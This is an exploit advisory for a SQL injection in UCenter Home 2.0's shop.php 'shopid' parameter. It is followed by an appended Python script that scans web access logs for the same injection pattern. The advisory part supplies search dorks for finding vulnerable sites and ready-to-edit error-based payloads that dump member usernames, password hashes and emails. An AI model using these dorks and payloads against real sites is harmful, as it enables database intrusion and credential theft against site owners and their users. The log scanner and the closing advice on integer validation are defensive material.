__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
DB : Okey.
Edit the DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okey.
Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
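
A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans web access logs for `shop.php?ac=view` requests whose `shopid` is not a plain integer and names the error-based markers it finds. Assumptions: combined-format access logs, and that legitimate `shopid` values are always plain integers; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers of the error-based pattern visible in the advisory's two requests.
MARKERS = {
    "floor(rand(0)*2) duplicate-key trick":
        re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "information_schema access": re.compile(r"information_schema\s*\.", re.I),
    "concat with hex literal": re.compile(r"concat\s*\(\s*0x[0-9a-f]+", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_line(line):
    """Return findings for one access-log line (empty list = nothing to report)."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    params = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes values
    if not url.path.lower().endswith("/shop.php") or params.get("ac") != ["view"]:
        return []
    findings = []
    for value in params.get("shopid", []):
        # Assumption: a legitimate shop id is a plain integer.
        if not re.fullmatch(r"[0-9]+", value):
            findings.append("non-numeric shopid")
        findings += [name for name, rx in MARKERS.items() if rx.search(value)]
    return findings

def scan(lines):
    """Map 1-based line number to findings, for lines that have any."""
    hits = {}
    for n, line in enumerate(lines, 1):
        found = inspect_line(line)
        if found:
            hits[n] = found
    return hits

# Constructed sample lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(0x7e,database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 912',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=12%27 HTTP/1.1" 200 640',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /space.php?uid=4 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG).items():
        print(n, found)
```

The same integer-only rule, enforced in the application before the value reaches the query, is what closes the hole; the log scan only shows who has been probing it.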